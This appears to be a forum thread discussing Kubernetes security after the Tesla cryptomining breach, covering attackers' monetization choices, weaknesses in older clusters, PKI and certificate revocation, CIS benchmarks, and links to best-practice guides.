Earlier this year, Tesla suffered a complex cryptocurrency mining malware infection caused by a misconfiguration in the Kubernetes console. The attackers exploited the fact that the particular Kubernetes console wasn’t password protected, allowing them to access one of the pods that included access credentials for Tesla’s larger AWS environment
Given the amount of driving data that Tesla has, and the apparent scope of the breach, I’m surprised the attackers only mined some crypto. Wonder if that’s because the data is well segregated, or if mining crypto is just more profitable than extracting and leaking data?
From logs I could watch the attackers spend an hour learning how to exploit some vulnerable php code, then learning how the customers admin area worked. Then they changed the html on some rarely seen pages to include google ads point to an account controlled by the attacker. And that was it - no trace of any other monitization or destruction.
The site in question was selling $1,000 a pop training courses via authorize.net. Given the access the attackers had, they could have run off with so many credit card numbers.
In a perfect free market for crime, this would never happen. A break in criminal would sell access to the organization that could extract the most “value” from the target. But as it is, many exploiters do not have the connections to do this, and so usually follow the same “monetization” pattern on target after target.
> In a perfect free market for crime, this would never happen. A break in criminal would sell access to the organization that could extract the most “value” from the target.
I don't know what you mean by "a perfect free market for crime", but penalties are presumably stiffer for cc theft vs selling ads; also more resources will be dedicated to finding the thief in the more severe case. So selling ads might be the right blend for more "conservative" hackers.
Mining crypto is seen as untraceable and therefore "safe". Plus the mining code scales very well, in that it can be run on a great many different hosts at once.
On the surface at least, the crime is seen as extremely low risk with the potential for a massive reward should one get lucky.
Something I often don't see mentioned -- be wary of older (as-in lifetime, not version), long-running clusters. I have found multiple times where a product has some vulnerabilities because I can land myself into an "older" cluster that predated various security enhancements that were made to: provisioning, iaas lockdown, etc, that will old clusters will almost surely not benefit from due to the nature of the "fixes" being in the initial configuration.
(As an example, "SomeProduct" allowed users to run somewhat arbitrary, non-privileged, non-root containers. I assumed it was K8s and poked around. All clusters were on GCE and ostensibly running the same versions, but due to how they were initially deployed, had different levels of vulnerability. The older clusters predated GCE blocking the metadata server, and predated the existence of TLS bootstrapping for kubelet, so for some of their clusters, it was easy to grab the kubelets key+cert and impersonate the kubelet as an unprivileged user. It sort of requires having someone paying a fair amount of attention upstream and/or knowing details of k8s provisioning to catch some of these things.)
What about PKI? I ran a decent size K8s cluster for a while and proper PKI was a pretty important thing IMHO. Everything running in a K8s environment supports PKI (roots, intermediates, client / server cn / rbac verification, etc) and there's no excuse to set things up properly when tools like cfssl exist and can be automated in deployment pipelines.
Edit: CRL[0] and OCSP(maybe?) appear to be coming soon.
CRL and OSCP have been asked for for a very long time! I don't see them coming anytime soon.
The golang TLS library author has a thing against them, so chose to not implement them[0].
Personally, I think he's wrong. He's describing a web browser style use case and not an internally managed CA for a single specific service, and he's then applied that reasoning to a languages TLS library. And it's left essentially all TLS in golang without revocation support.
For Kubernetes, you'll need to wire up nginx/haproxy whatever in front of every endpoint to do TLS+CRL checks before handing off the connection to the actual backend (kube-api, kubelet, etc) over 127.0.0.1 (still with SSL! Lookback is not safe when untrusted code is running on your server..).
The thing I love about Kubernetes is that it's batteries included and enterprise-first. Sure, it's not as simple as docker but when crunch time hits and you need security depth the configurability of Kubernetes is unmatched. Perhaps it just needs to be surfaced better.
I got forwarded the CIS Securing Kubernetes benchmark document a few days back. That had around 100 things that should be set on a cluster for your Enterprise's next security audit.
There used to be a runnable cis benchmark libraries like neuvector/kuberntes-cis-benchmark[0] but there are less these days. Aqua Security also has one called kube-bench[1] which looks to be in better shape.
https://kubernetes.io/blog/2016/08/security-best-practices-k...
https://www.aquasec.com/wiki/display/containers/Kubernetes+S...
https://dev.to/petermbenjamin/kubernetes-security-best-pract...
https://techbeacon.com/hackers-guide-kubernetes-security
https://www.sumologic.com/blog/devops/kubernetes-security-be...
https://news.ycombinator.com/item?id=16764743
https://speakerdeck.com/ianlewis/kubernetes-security-best-pr...
https://dzone.com/articles/kubernetes-security-best-practice...
and a quick search reveals a full length e-book about it:
https://info.aquasec.com/kubernetes-security-sem (https://kubernetes-security.info/)
https://cdn2.hubspot.net/hubfs/1665891/Assets/Kubernetes%20S...